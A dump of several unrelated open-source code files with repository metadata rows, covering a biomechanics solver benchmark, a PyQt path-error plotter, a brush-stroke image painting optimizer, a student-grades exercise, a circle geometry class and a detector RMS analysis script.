        # Models are re-created per solver run so each OCP starts fresh.
        biorbd_model = (
            biorbd.Model(root_path + "/models/Gait_1leg_12dof_heel.bioMod"),
            biorbd.Model(root_path + "/models/Gait_1leg_12dof_flatfoot.bioMod"),
            biorbd.Model(root_path + "/models/Gait_1leg_12dof_forefoot.bioMod"),
            biorbd.Model(root_path + "/models/Gait_1leg_12dof_0contact.bioMod"),
        )
        ocp = prepare_ocp(
            biorbd_model=biorbd_model,
            final_time=phase_time,
            nb_shooting=number_shooting_points,
            markers_ref=markers_ref,
            grf_ref=grf_ref,
            q_ref=q_ref,
            qdot_ref=qdot_ref,
            activation_ref=emg_ref,
            nb_threads=8,
            ode_solver=ode_solver,
        )

        solver = Solver.IPOPT()
        solver.set_linear_solver("ma57")
        solver.set_convergence_tolerance(1e-3)
        solver.set_hessian_approximation("exact")
        solver.set_maximum_iterations(3000)
        solver.set_print_level(0)

        # --- Solve the program --- #
        tic = time()
        sol = ocp.solve(solver=solver)
        toc = time() - tic
        sol_merged = sol.merge_phases()

        # Record problem dimensions and solver statistics for the table.
        out.solver.append(out.Solver("Ipopt"))
        out.solver[i].nx = sol_merged.states["all"].shape[0]
        out.solver[i].nu = sol_merged.controls["all"].shape[0]
        out.solver[i].ns = sol_merged.ns[0]
        out.solver[i].ode_solver = ode_solver
        out.solver[i].n_iteration = sol.iterations
        out.solver[i].cost = sol.cost
        out.solver[i].convergence_time = toc
        out.solver[i].compute_error_single_shooting(sol)
| s2mLab/BioptimPaperExamples | gait/generate_table.py | generate_table.py | py | 3,001 | python | en | code | 3 | github-code | 90 |
31608430415 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import copy
import pyqtgraph as pg
import re
from PyQt5 import QtWidgets, uic, QtGui, QtCore
from path_to_path.read_file_dialog import read_file_dialog as dialog
from path_to_path.path_calculation import path_calculation as path_calc
pg.setConfigOption("background", "w")
pg.setConfigOption("foreground", "k")
COLOURS = [QtGui.QColor(QtCore.Qt.red),
QtGui.QColor(QtCore.Qt.green),
QtGui.QColor(QtCore.Qt.blue),
QtGui.QColor(QtCore.Qt.black),
QtGui.QColor(QtCore.Qt.magenta),
]
class GraphView(QtWidgets.QWidget):
    """Main widget plotting cross-track and path-to-path errors.

    Loads its layout from ``graph_view.ui`` (the ``widget_xtrack`` /
    ``widget_path_to_path`` plot widgets and the text panes are presumably
    defined there — confirm against the .ui file), lets the user pick up to
    five track files via a dialog, and plots the computed xtrack and
    path-to-path series with per-file statistics.
    """

    def __init__(self, *args, **kwargs):
        super(QtWidgets.QWidget, self).__init__(*args, **kwargs)
        # Load the Qt Designer layout into this widget instance.
        uic.loadUi(
            os.path.join(os.path.split(__file__)[0], "graph_view.ui"),
            self)

        # Configure both pyqtgraph plot widgets (grid, titles, axis labels).
        self.widget_xtrack.showGrid(True, True, 1)
        self.widget_xtrack.setTitle('Xtrack graphs')
        self.widget_xtrack.setLabel('left', 'Xtrack, (m)')
        self.widget_xtrack.setLabel('bottom', 'Time, (h:m:s)')

        self.widget_path_to_path.showGrid(True, True, 1)
        self.widget_path_to_path.setTitle('Path-to-path graphs')
        self.widget_path_to_path.setLabel('left', 'Path-to-path, (m)')
        self.widget_path_to_path.setLabel('bottom', 'Time, (h:m:s)')

        # Legends are attached directly to each plot's graphics item.
        self.legend_xtrack = pg.LegendItem()
        self.legend_xtrack.setParentItem(
            self.widget_xtrack.graphicsItem())

        self.legend_path_to_path = pg.LegendItem()
        self.legend_path_to_path.setParentItem(
            self.widget_path_to_path.graphicsItem())

        # Bookkeeping of currently plotted curves so they can be cleared
        # on the next file-open.
        self.names_path_to_path = []
        self.plots_path_to_path = []
        self.names_xtrack = []
        self.plots_xtrack = []

        self.dialog = dialog.ReadFileDialog()

        # Template description for one track file; deep-copied per file.
        self.desc = {'Name': None,
                     'Short_name': None,
                     'Message': None,
                     'System': None,
                     'Path': None,
                     'Points': {
                         'A': {
                             'X_lat': 0.0,
                             'Y_lon': 0.0,
                             'Z_alt': 0.0},
                         'B': {
                             'X_lat': 0.0,
                             'Y_lon': 0.0,
                             'Z_alt': 0.0}}
                     }

        # The five per-file input widgets of the open dialog.
        self.guis = [self.dialog.file_widget_1,
                     self.dialog.file_widget_2,
                     self.dialog.file_widget_3,
                     self.dialog.file_widget_4,
                     self.dialog.file_widget_5
                     ]
        self.items_desc = []
        self.pairs = {}

    def open_files(self):
        """Run the file dialog, compute the series and (re)draw both plots.

        Clears any previously plotted curves and legend entries first, then
        builds one description dict per filled-in dialog row, computes the
        xtrack / path-to-path series, plots them, and writes per-file
        statistics into the two text panes.
        """
        if self.names_xtrack or self.names_path_to_path:
            # Remove stale curves and legend entries from a previous run.
            [self.legend_xtrack.removeItem(_) for _ in self.names_xtrack]
            [self.legend_path_to_path.removeItem(_)
             for _ in self.names_path_to_path]
            self.names_xtrack = []
            self.names_path_to_path = []
            self.plots_xtrack = []
            self.widget_xtrack.clear()
            self.widget_path_to_path.clear()
            self.items_desc = []

        desc = copy.deepcopy(self.desc)
        if QtWidgets.QDialog.Accepted == self.dialog.exec_():
            # Collect a description for every dialog row that has a file name.
            for idx, val in enumerate(self.guis):
                if val.lineEdit.text():
                    desc['Name'] = val.lineEdit.text()
                    desc['Short_name'] = val.lineEdit_2.text()
                    desc['Message'] = val.comboBox_calc.currentText()
                    desc['System'] = val.comboBox_system.currentText()
                    desc['Points']['A']['X_lat'] = self.str2float(
                        val.lineEdit_Ax.text())
                    desc['Points']['A']['Y_lon'] = self.str2float(
                        val.lineEdit_Ay.text())
                    desc['Points']['A']['Z_alt'] = self.str2float(
                        val.lineEdit_Az.text())
                    desc['Points']['B']['X_lat'] = self.str2float(
                        val.lineEdit_Bx.text())
                    desc['Points']['B']['Y_lon'] = self.str2float(
                        val.lineEdit_By.text())
                    desc['Points']['B']['Z_alt'] = self.str2float(
                        val.lineEdit_Bz.text())
                    self.items_desc.append(desc)
                    desc = copy.deepcopy(self.desc)

            ptp = self.path_to_path_calc(self.items_desc)

            description_xt = ""
            description_ptp = ""
            for i, p in enumerate(ptp):
                pen = pg.mkPen(color=COLOURS[i], width=1)

                # --- xtrack curve ---
                y_xt = p[1].xtrack_AB
                x = [(i, t.strftime('%H:%M:%S'))
                     for i, t in enumerate(p[1].time_AB)]
                pw_xt = self.widget_xtrack
                pw_xt.setWindowTitle('Path-to-Path')
                plot_xt = pw_xt.plot(range(len(y_xt)), y_xt, pen=pen)
                pw_xt.getAxis('bottom').setTicks([x])
                # Thin the tick labels to ~10 evenly spaced time stamps.
                # NOTE(review): int(len(x) / 10) is 0 for fewer than 10
                # samples, which would make range() raise — assumes long
                # tracks; confirm.
                ran = range(0, len(x), int(len(x) / 10))
                dx = [x[v] for v in ran]
                pw_xt.getAxis('bottom').setTicks([dx, []])

                self.legend_xtrack.addItem(plot_xt, p[0])
                self.names_xtrack.append(p[0])
                self.plots_xtrack.append(plot_xt)

                # --- path-to-path curve ---
                y_p2p = p[1].p2p_AB
                pw_p2p = self.widget_path_to_path
                pw_p2p.setWindowTitle('Path-to-Path')
                plot_p2p = pw_p2p.plot(range(len(y_p2p)), y_p2p, pen=pen)
                # The last 900 samples are dropped from the tick source —
                # presumably to match the shorter p2p series; verify against
                # PathCalc.
                x_p2p = x[:-900]
                pw_p2p.getAxis('bottom').setTicks([x_p2p])
                ran = range(0, len(x_p2p), int(len(x_p2p) / 10))
                dx_p2p = [x_p2p[v] for v in ran]
                pw_p2p.getAxis('bottom').setTicks([dx_p2p, []])

                self.legend_path_to_path.addItem(plot_p2p, p[0])
                self.names_path_to_path.append(p[0])
                self.plots_path_to_path.append(plot_p2p)

                # Per-file statistics text for the two panes.
                description_xt += str(i + 1) + ') '
                description_xt += p[0] + ':'
                description_xt += 'Number of points = '
                description_xt += str(len(p[1].xtrack_AB)) + '\n'
                description_xt += '\tXtrack statistics:' + '\n'
                description_xt += '\tMean = ' + str(p[1].xt_mean) + '\n'
                description_xt += '\tRMS x 2 = ' + str(p[1].xt_rms) + '\n\n'

                description_ptp += str(i + 1) + ') '
                description_ptp += p[0] + ':'
                description_ptp += 'Number of points = '
                description_ptp += str(len(p[1].xtrack_AB)) + '\n'
                description_ptp += '\tPath-to-path statistics:' + '\n'
                description_ptp += '\tMean = ' + str(p[1].ptp_mean) + '\n'
                description_ptp += '\tRMS x 2 = ' + str(p[1].ptp_rms) + '\n\n'

            self.plainTextEdit.setPlainText(description_xt)
            self.plainTextEdit_2.setPlainText(description_ptp)

    def path_to_path_calc(self, items):
        """Build (short_name, PathCalc) pairs for every described file."""
        paths = [(_['Short_name'], path_calc.PathCalc(_)) for _ in items]
        return paths

    def str2float(self, val):
        """Parse a coordinate string, accepting ',' as the decimal mark.

        Raises RuntimeError if the string contains any letters.
        """
        if not re.search('[a-zA-Z]+', val):
            return float(".".join(val.split(",")))
        else:
            raise RuntimeError('XYZ should not have letters')
def main():
    """Create the Qt application, show the main widget and run the event loop."""
    app = QtWidgets.QApplication(sys.argv)
    w = GraphView()
    w.show()
    sys.exit(app.exec_())


if __name__ == '__main__':
    main()
| peace2017/path_to_path | path_to_path/graph_view/graph_view.py | graph_view.py | py | 7,500 | python | en | code | 0 | github-code | 90 |
12654873333 | import numpy as np
from PIL import Image
from functools import partial
import cProfile, pstats, io
from time import time
from tqdm import tqdm, trange
import os
def get_max_beta_for_zero_sxy_and_sxx(mx, my, n):
    """Largest admissible slope ``beta`` when both s_xy and s_xx vanish.

    For each coordinate ``j`` the pairs ``(mx[j], my[j])`` and their
    complements about 1 constrain the slope; the bound starts at 1.0 and is
    shrunk to the smallest ratio ``b / a`` over all pairs with ``a != 0``.
    Returns 0.0 immediately if any such pair has ``b == 0``.
    """
    bound = 1.0
    for j in range(n):
        candidates = ((mx[j], my[j]), (1 - mx[j], 1 - my[j]))
        for denom, numer in candidates:
            if denom == 0:
                continue
            if numer == 0:
                return 0.0
            bound = min(bound, numer / denom)
    return bound
def get_least_squares_paint_regression_coefs(x, y):
    '''Returns the least squares regression estimates for the model
    y = alpha + beta * x, where x, y, and alpha are n-dimensional vectors
    and beta is a scalar.

    Parameters:
        x: array of shape (m, n): list of example x
        y: array of shape (m, n): list of example y

    Returns: a tuple (alpha, beta)'''
    x = np.array(x)
    y = np.array(y)
    assert len(x.shape) == len(y.shape) == 2
    assert x.shape == y.shape
    m, n = x.shape
    assert m >= 1

    if m == 1:
        # A single example is matched exactly by the offset alone.
        return y[0], 0.0

    mx = x.mean(axis=0)
    my = y.mean(axis=0)
    sxy = np.mean(x * y) - np.mean(mx * my)
    sxx = np.mean(x**2) - np.mean(mx**2)
    if np.isclose(sxy, 0, rtol=0.0, atol=1e-8):
        # Recompute the covariance in centred form (numerically safer).
        sxy = np.mean((x - mx) * (y - my))

    # Solve beta * sxx == sxy, handling the degenerate combinations.
    sxy_vanishes = np.isclose(sxy, 0, rtol=0.0, atol=1e-8)
    if sxy_vanishes and sxx == 0:
        # beta is unconstrained; take the midpoint of the admissible range.
        beta = get_max_beta_for_zero_sxy_and_sxx(mx, my, n) / 2
    elif sxy_vanishes:
        # sxx != 0 forces beta to zero.
        beta = 0.0
    elif sxx == 0:
        raise RuntimeError(f"no solution to regression {sxx} {sxy}")
    else:
        beta = sxy / sxx

    alpha = my - beta * mx
    return alpha, beta
def test():
    """Manual smoke test for the regression and a whole-image transform.

    Fits alpha/beta on hand-picked arrays, then applies the fitted transform
    to 'image-52.jpg' (must exist next to the script) and writes
    'new_im.png'.  Intended to be run by hand, not as an automated test.
    """
    # x = np.array([
    #     [0.3, 0.5, 0.7],
    #     [0.6, 0.2, 0.1]
    # ])
    # Constant x exercises the degenerate (sxx == 0) branch.
    x = np.array([
        [1.0, 1.0, 1.0],
        [1.0, 1.0, 1.0]
    ])
    y = np.array([
        [0.7, 0.4, 0.2],
        [0.3, 0.9, 0.5]
    ])
    # y = np.array([
    #     [0.7, 0.8, 0.9],
    #     [0.8, 0.5, 0.3]
    # ])
    # y = 0.6 * np.array([0.5, 0.7, 0.2]) + 0.4 * x
    alpha, beta = get_least_squares_paint_regression_coefs(x, y)
    print(alpha, beta)
    # Recover the equivalent "paint" parameters: opacity o and colour c.
    o = 1 - beta
    c = alpha / o
    print(c, o)

    im = Image.open('image-52.jpg')
    arr = np.asarray(im) / 255
    print(arr.shape)
    # arr_reshaped = arr.reshape(-1, 3)
    # print(arr_reshaped.shape)
    # Apply the fitted affine transform to every pixel and save the result.
    arr2 = alpha + beta * arr
    im2_arr = (arr2 * 255).astype(np.uint8)
    im2 = Image.fromarray(im2_arr)
    im2.save('new_im.png')
def get_circle_brush_boundary(row0, col0, brush_size, m, n):
    '''Returns the boundary of a circular brush, in the form of a tuple
    (min_row, max_row, row_specs)
    where row_specs is a list and row_specs[i] is of the form (min_col, max_col)
    where row_specs[i] corresponds to the i'th row of the brush and corresponds
    to row min_row + i.

    Parameters:
        row0: row of center of brush
        col0: column of center of brush
        brush_size: radius of brush
        m: number of rows in image
        n: number of columns in image'''
    top = max(row0 - brush_size, 0)
    bottom = min(row0 + brush_size, m - 1)
    spans = []
    for r in range(top, bottom + 1):
        # Half-width of the circle at this row (chord of the circle).
        half_width = np.sqrt(brush_size**2 - (r - row0)**2)
        left = max(0, int(round(col0 - half_width)))
        right = min(n - 1, int(round(col0 + half_width)))
        spans.append((left, right))
    return top, bottom, spans
def evaluate_loss_circle_brush(x, arr, painting, curr_loss=None, enforce_brush_regression=False):
    """Evaluate the squared-error loss if the stroke ``x`` were applied.

    ``x`` is ``(row, col, brush_size)``.  The best affine repaint
    ``p <- alpha + beta * p`` over the brush disc is fitted by least squares,
    and the total loss is updated incrementally: subtract the disc's current
    contribution, add its contribution after the repaint.

    Parameters:
        x: candidate stroke (row0, col0, brush_size)
        arr: target image, shape (m, n, c), values in [0, 1]
        painting: current canvas, same shape as arr
        curr_loss: total loss of `painting` vs `arr`; recomputed if None
        enforce_brush_regression: if True, reject fits that do not map to a
            physical paint stroke (opacity o = 1 - beta in (0, 1] and colour
            c = alpha / o inside [0, 1]) by returning an infinite loss.

    Returns: (new_total_loss, (alpha, beta))
    """
    row0, col0, brush_size = x
    m, n, c = arr.shape
    min_row, max_row, row_specs = get_circle_brush_boundary(row0, col0, brush_size, m, n)
    rows = range(min_row, max_row + 1)

    # Gather all pixels covered by the brush disc.
    painting_brush_rows = []
    arr_brush_rows = []
    for row, (min_col, max_col) in zip(rows, row_specs):
        painting_brush_rows.append(painting[row, min_col : max_col + 1])
        arr_brush_rows.append(arr[row, min_col : max_col + 1])
    painting_brush_pixels = np.concatenate(painting_brush_rows)
    arr_brush_pixels = np.concatenate(arr_brush_rows)

    alpha, beta = get_least_squares_paint_regression_coefs(painting_brush_pixels, arr_brush_pixels)

    if enforce_brush_regression:
        # Opacity must be in (0, 1] ...
        o = 1 - beta
        if not (0 < o <= 1):
            return np.inf, (alpha, beta)
        # ... and the implied colour must be a valid pixel value.
        # NOTE: `c` shadows the channel count from the unpack above.
        c = alpha / o
        if not np.all(np.logical_and(0 <= c, c <= 1)):
            return np.inf, (alpha, beta)

    if curr_loss is None:
        curr_loss = np.sum((painting - arr)**2)

    # Incremental update: replace the disc's old loss with its new loss.
    curr_loss -= np.sum((painting_brush_pixels - arr_brush_pixels)**2)
    new_painting_brush_pixels = alpha + beta * painting_brush_pixels
    curr_loss += np.sum((new_painting_brush_pixels - arr_brush_pixels)**2)
    return curr_loss, (alpha, beta)
def apply_circle_brush(painting, row, col, brush_size, alpha, beta):
    """Apply the affine repaint ``p <- alpha + beta * p`` over a brush disc,
    modifying ``painting`` in place."""
    num_rows, num_cols, _ = painting.shape
    top, bottom, spans = get_circle_brush_boundary(row, col, brush_size, num_rows, num_cols)
    for r, (left, right) in zip(range(top, bottom + 1), spans):
        segment = painting[r, left : right + 1]
        painting[r, left : right + 1] = alpha + beta * segment
def random_search(loss_func, random_candidate_func, n_samples, init_best_loss=np.inf):
    """Draw ``n_samples`` random candidates and keep the lowest-loss one.

    ``loss_func`` must return ``(loss, info)``.  Candidates that do not beat
    ``init_best_loss`` are discarded, so all three results may stay at their
    initial values (``None``, ``init_best_loss``, ``None``).
    """
    best_x, best_loss, best_info = None, init_best_loss, None
    for _ in range(n_samples):
        candidate = random_candidate_func()
        loss, info = loss_func(candidate)
        if loss < best_loss:
            best_x, best_loss, best_info = candidate, loss, info
    return best_x, best_loss, best_info
def random_restart_stochastic_hill_climbing(loss_func, random_candidate_func, neighbor_func, n_samples, n_opt_iter, n_neighbors, stop_if_no_improvement, init_best_loss=np.inf):
    """Stochastic hill climbing from ``n_samples`` random restarts.

    Each restart begins at a random candidate and takes up to ``n_opt_iter``
    steps; at every step, ``n_neighbors`` neighbours of the current point are
    sampled and the best of the batch replaces the current point if it
    improves the loss (otherwise the restart optionally stops early).

    Returns ``(best_x, best_loss, best_info)`` over all restarts; ``best_x``
    and ``best_info`` remain ``None`` if nothing beat ``init_best_loss``.
    """
    best_x, best_loss, best_info = None, init_best_loss, None
    for _restart in range(n_samples):
        current = random_candidate_func()
        current_loss, current_info = loss_func(current)
        for _step in range(n_opt_iter):
            # Sample a batch of neighbours; keep the best of the batch.
            top, (top_loss, top_info) = neighbor_func(current), (None, None)
            top_loss, top_info = loss_func(top)
            for _extra in range(n_neighbors - 1):
                cand = neighbor_func(current)
                cand_loss, cand_info = loss_func(cand)
                if cand_loss < top_loss:
                    top, top_loss, top_info = cand, cand_loss, cand_info
            if top_loss < current_loss:
                current, current_loss, current_info = top, top_loss, top_info
            elif stop_if_no_improvement:
                # print(_step)
                break
        if current_loss < best_loss:
            best_x, best_loss, best_info = current, current_loss, current_info
    return best_x, best_loss, best_info
def make_painting(arr, n_iter, min_brush_size, max_brush_size, method='random search', save_every=None, folder_name=None, **opt_kwargs):
    '''Creates a painting of the image arr.

    Parameters:
        arr: numpy array of shape (M, N, C)
            where (M, N) are the dimensions of the image
            and C is the number of channels.
            All values in arr should be between 0 and 1.
        n_iter: the number of stroke iterations to run
        min_brush_size: minimum brush size allowed
        max_brush_size: maximum brush size allowed
        method: 'random search' or 'hill climbing' — how each stroke's
            position/size is optimized
        save_every: if not None, save an intermediate image every
            `save_every` iterations into `folder_name`
        folder_name: output directory, required when save_every is set
        opt_kwargs: passed to the chosen optimizer ('n_samples' for random
            search; plus 'n_opt_iter', 'n_neighbors',
            'stop_if_no_improvement', 'brush_position_delta',
            'brush_size_change_factor' for hill climbing)

    Returns: (painting, final_loss) where painting has the same shape as
    arr.'''
    assert len(arr.shape) == 3
    m, n, c = arr.shape
    # Start from a white canvas.
    painting = np.ones(arr.shape)

    def generate_random_candidate():
        # Uniform position; log-uniform brush size so small brushes are
        # sampled as often as large ones.
        row = np.random.randint(0, m)
        col = np.random.randint(0, n)
        log_brush_size = np.random.uniform(np.log(min_brush_size), np.log(max_brush_size))
        brush_size = int(round(np.exp(log_brush_size)))
        return row, col, brush_size

    if method == 'random search':
        assert 'n_samples' in opt_kwargs
    elif method == 'hill climbing':
        n_samples = opt_kwargs['n_samples']
        n_opt_iter = opt_kwargs['n_opt_iter']
        n_neighbors = opt_kwargs['n_neighbors']
        stop_if_no_improvement = opt_kwargs['stop_if_no_improvement']
        brush_position_delta = opt_kwargs['brush_position_delta']
        brush_size_change_factor = opt_kwargs['brush_size_change_factor']

        def get_neighbor(x):
            # Perturb position within +/- brush_position_delta and the brush
            # size log-uniformly within a multiplicative factor, rejecting
            # out-of-range draws.
            r, c, bs = x
            r_new = r + np.random.randint(-brush_position_delta, brush_position_delta + 1)
            while not (0 <= r_new < m):
                r_new = r + np.random.randint(-brush_position_delta, brush_position_delta + 1)
            c_new = c + np.random.randint(-brush_position_delta, brush_position_delta + 1)
            while not (0 <= c_new < n):
                c_new = c + np.random.randint(-brush_position_delta, brush_position_delta + 1)
            log_min_bs, log_max_bs = np.log(bs / brush_size_change_factor), np.log(bs * brush_size_change_factor)
            bs_new = int(round(np.exp(np.random.uniform(log_min_bs, log_max_bs))))
            while not (min_brush_size <= bs_new <= max_brush_size):
                bs_new = int(round(np.exp(np.random.uniform(log_min_bs, log_max_bs))))
            return r_new, c_new, bs_new

    curr_loss = np.sum((painting - arr)**2)
    print(f"Initial loss: {curr_loss}")

    if save_every is not None:
        assert folder_name is not None
        if not os.path.isdir(folder_name):
            os.mkdir(folder_name)

    pbar = tqdm(total=n_iter)
    for i in range(n_iter):
        loss_func = partial(evaluate_loss_circle_brush, arr=arr, painting=painting, curr_loss=curr_loss, enforce_brush_regression=True)
        if method == 'random search':
            best_candidate, best_loss, best_params = random_search(
                loss_func, generate_random_candidate, **opt_kwargs, init_best_loss=curr_loss)
        elif method == 'hill climbing':
            best_candidate, best_loss, best_params = random_restart_stochastic_hill_climbing(
                loss_func, generate_random_candidate, get_neighbor, n_samples=n_samples, n_opt_iter=n_opt_iter, n_neighbors=n_neighbors, stop_if_no_improvement=stop_if_no_improvement, init_best_loss=curr_loss)
        else:
            raise ValueError('parameter "method" must be either "random search" or "hill climbing"')

        if best_candidate is not None:
            # Commit the winning stroke to the canvas.
            curr_loss = best_loss
            best_row, best_col, best_brush_size = best_candidate
            best_alpha, best_beta = best_params
            apply_circle_brush(painting, best_row, best_col, best_brush_size, best_alpha, best_beta)
            desc = f"Iteration {i+1}: Loss {curr_loss:.5g}, row {best_row}, col {best_col}, brush size {best_brush_size}"
        else:
            desc = f"Iteration {i+1}: Loss {curr_loss:.5g}, could not improve"

        # BUG FIX: previously `(i+1) % save_every` raised TypeError whenever
        # save_every was left at its default of None.
        if save_every is not None and (i + 1) % save_every == 0:
            fname = os.path.join(folder_name, f'{i+1}.png')
            im_arr = (painting * 255).astype(np.uint8)
            im = Image.fromarray(im_arr)
            im.save(fname)

        pbar.set_description(desc)
        pbar.update()
    pbar.close()

    return painting, curr_loss
if __name__ == '__main__':
    # Load the target image and normalize to [0, 1].
    im = Image.open('image-52.jpg')
    arr = np.asarray(im) / 255

    # params = {
    #     'n_iter': 100_000,
    #     'min_brush_size': 1,
    #     'max_brush_size': 150,
    #     'method': 'random search',
    #     'n_samples': 20
    # }
    # Hill-climbing configuration for make_painting.
    params = {
        'n_iter': 1000,
        'min_brush_size': 1,
        'max_brush_size': 30,
        'method': 'hill climbing',
        'n_samples': 5,
        'n_opt_iter': 10,
        'n_neighbors': 3,
        'stop_if_no_improvement': True,
        'brush_position_delta': 60,
        'brush_size_change_factor': 1.3
    }

    # pr = cProfile.Profile()
    # pr.enable()

    # Encode the configuration into the output folder/file names.
    painting_info_string = '_'.join(f'{k}={v}' for k, v in params.items())

    t0 = time()
    painting, loss = make_painting(arr, save_every=50, folder_name=painting_info_string, **params)
    dt = time() - t0
    print(f"Time taken: {dt:.6f}s")

    # pr.disable()
    # s = io.StringIO()
    # ps = pstats.Stats(pr, stream=s).sort_stats('cumulative')
    # ps.print_stats(20)
    # print(s.getvalue())

    # Save the final painting with the loss embedded in the file name.
    im2_arr = (painting * 255).astype(np.uint8)
    im2 = Image.fromarray(im2_arr)
    fname = 'painting_' + painting_info_string + f'_loss={loss:.1f}.png'
    im2.save(fname)
4829184591 | #Exercício Python 105: Faça um programa que tenha uma função notas() que pode receber várias notas de alunos e vai retornar um dicionário com as seguintes informações:
#– Quantidade de notas
#– A maior nota
#– A menor
#– A média da turma
#– A situação (opcional)
def notas(*valor, show=False):
    """
    -> Analyse the grades and overall situation of a class.

    :param valor: one or more student grades (variadic)
    :param show: optional flag; when True, the class situation is included
    :return: dictionary with the grade count, highest, lowest, mean and
             (optionally) the situation of the class.
    """
    resumo = {
        'total': len(valor),
        'maior': max(valor),
        'menor': min(valor),
        'media': sum(valor) / len(valor),
    }
    if show:
        media = resumo['media']
        if media >= 7:
            resumo['situacao'] = 'BOA'
        elif media >= 5:
            resumo['situacao'] = 'RAZOAVEL'
        else:
            resumo['situacao'] = 'RUIM'
    return resumo
# Demonstration: three low grades yield a 'RUIM' situation.
resposta = notas(5.5, 2.5, 1.5, show=True)
print(resposta)
# Print the function's generated documentation.
help(notas)
27807880123 | import math
from typing import Union
from models.base import Processable
class Circle(Processable):
    """Circle defined by any one of radius, diameter, area or perimeter.

    Construct it with the known measure(s); the lazy properties derive and
    cache the missing ones (``d = 2r``, ``S = pi*r**2``, ``L = 2*pi*r``).
    A value that cannot be derived evaluates to 0.

    Bug fixes vs. the previous version:
    * ``radius`` computed the value from the perimeter but then returned 0.
    * ``square`` computed ``pi * r**2`` but fell through to ``return 0``
      without returning the computed value.
    Also generalized: ``diameter``/``square``/``perimeter`` now derive via
    the ``radius`` property chain, so e.g. the diameter is available when
    only the area was given (backward compatible — previously-working
    inputs produce the same results).
    """

    def __init__(
        self,
        radius: Union[int, float],
        diameter: Union[int, float],
        square: Union[int, float],
        perimeter: Union[int, float],
    ):
        self._radius = radius
        self._diameter = diameter
        self._square = square
        self._perimeter = perimeter

    @property
    def radius(self) -> Union[int, float]:
        """Radius, derived from whichever measure is known (0 if none)."""
        if self._radius:
            return self._radius
        elif self._diameter:
            # r = d / 2
            self._radius = self._diameter / 2
            return self._radius
        elif self._square:
            # r = sqrt(S / pi)
            self._radius = math.sqrt(self._square / math.pi)
            return self._radius
        elif self._perimeter:
            # r = L / (2 * pi)  — previously this value was computed but 0
            # was returned instead.
            self._radius = self._perimeter / (2 * math.pi)
            return self._radius
        return 0

    @property
    def diameter(self) -> Union[int, float]:
        """Diameter, derived via the radius chain (0 if underived)."""
        if self._diameter:
            return self._diameter
        # d = 2r; radius itself may be derived from square/perimeter.
        radius = self.radius
        if radius:
            self._diameter = radius * 2
            return self._diameter
        return 0

    @property
    def square(self) -> Union[int, float]:
        """Area, derived via the radius chain (0 if underived)."""
        if self._square:
            return self._square
        radius = self.radius
        if radius:
            # S = pi * r**2 — previously the computed value was discarded.
            self._square = math.pi * radius**2
            return self._square
        return 0

    @property
    def perimeter(self) -> Union[int, float]:
        """Perimeter (circumference), derived via the radius chain."""
        if self._perimeter:
            return self._perimeter
        radius = self.radius
        if radius:
            # L = 2 * pi * r
            self._perimeter = 2 * math.pi * radius
            return self._perimeter
        return 0
| AlexFoxalt/GeoPymetry | models/circles.py | circles.py | py | 1,718 | python | en | code | 0 | github-code | 90 |
74404983977 | import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
import argparse
import ROOT, array, ctypes, datetime
from matplotlib import style
style.use('plt.mplstyle')
def get_unixtime_rms_arrays(bad_run_list, file_list):
    """Collect per-run timestamps and 16-channel RF-trigger RMS values.

    Opens each ROOT file in ``file_list``, reads the single entry of its
    ``rms_tree``, and keeps runs that are not in ``bad_run_list``.

    Parameters:
        bad_run_list: run numbers to exclude
        file_list: paths to per-run ROOT files

    Returns: (unixtimes, rms, runnums) where unixtimes is an array of
    ``datetime`` objects, rms has shape (16, n_good_runs) and runnums holds
    the kept run numbers.
    """
    unixtimes = []
    rms = {}
    for c in range(16):
        rms[c] = []
    runnums = []
    for f in file_list:
        print(f'Working on {f}')
        # Buffers that ROOT fills when the entry is read.
        rf_rms = array.array("d", [0]*16)
        unix_time = ctypes.c_int()
        run_num = ctypes.c_int()
        file = ROOT.TFile.Open(f)
        inTree = file.Get("rms_tree")
        inTree.SetBranchAddress("runNumber", run_num)
        inTree.SetBranchAddress("RMS_RFTrigger", rf_rms)
        inTree.SetBranchAddress("unixTime", unix_time)
        inTree.GetEntry(0) # there's only one entry
        if run_num.value not in bad_run_list:
            unixtimes.append(datetime.datetime.fromtimestamp(unix_time.value))
            runnums.append(run_num.value)
            for c in range(16):
                rms[c].append(rf_rms[c])
        file.Close()
    unixtimes = np.asarray(unixtimes)
    rms = np.array(list(rms.values())) # cast this into a 2D array
    runnums = np.asarray(runnums)
    return unixtimes, rms, runnums
def load_bad_run_list(station):
    """Return the run numbers listed in the station's bad-run log.

    Reads the tab-separated log at ``runlogs/logs/a<station>_log.txt``
    (columns: run, user, reason, log) and returns the 'run' column.
    """
    log_path = f'runlogs/logs/a{station}_log.txt'
    info = np.genfromtxt(
        log_path,
        skip_header=0,
        delimiter='\t',
        names=['run', 'user', 'reason', 'log'],
    )
    return info['run']
# Stage 1 (disabled by default): harvest RMS-vs-time arrays from the ROOT
# files and cache them as per-station .npz files.
get_arrays = False
if get_arrays:
    stations = [1, 2, 3, 4, 5]
    stations = [1]  # overridden: only station 1 is harvested here
    for s in stations:
        bad_runs = load_bad_run_list(s)
        import glob
        top_dir = '/mnt/scratch/baclark/ARA/rms/'
        files = sorted(glob.glob(f'{top_dir}/*/A{s}/*.root'))
        unixtimes, rms, runnums = get_unixtime_rms_arrays(bad_runs, files)
        np.savez(f'a{s}_rms_vs_unixtime.npz',
                 unixtimes=unixtimes, rms=rms, runnums=runnums
                 )

# Stage 2: load the cached arrays and plot RMS vs time for one chosen
# channel per station.
plot_arrays = True
if plot_arrays:
    # Representative channel per station (comments record the selection notes).
    which_chans = {
        1: 5,  # maybe 5?
        2: 2,
        3: 13,  # 5 isn't bad, or 9, or 13, or 14
        4: 1,  # 5 isn't *horrible*, 10 not bad, 13 not bad, 14 not bad (use for now)
        5: 1
    }

    def harvest(npz_file, chan):
        # Pull (timestamps, single-channel RMS, run numbers) from a cache file.
        file = np.load(npz_file, allow_pickle=True)
        return file['unixtimes'], file['rms'][chan], file['runnums']

    stations = [1, 2, 3, 4, 5]

    unixtimes = {}
    rms = {}
    runnums = {}
    masks = {}

    # Unix-time window to plot; earlier assignments are superseded.
    guard_time = 1325394000  # something early
    guard_time = 1513317600
    guard_time_2 = 1610690400
    guard_time_2 = 1642226400  # to show 2021
    # guard_time_2 = 1800000000

    for s in stations:
        tmp_unixtimes, tmp_rms, tmp_runnums = harvest(
            f'a{s}_rms_vs_unixtime.npz',
            which_chans[s]
        )
        unixtimes[s] = tmp_unixtimes
        rms[s] = tmp_rms
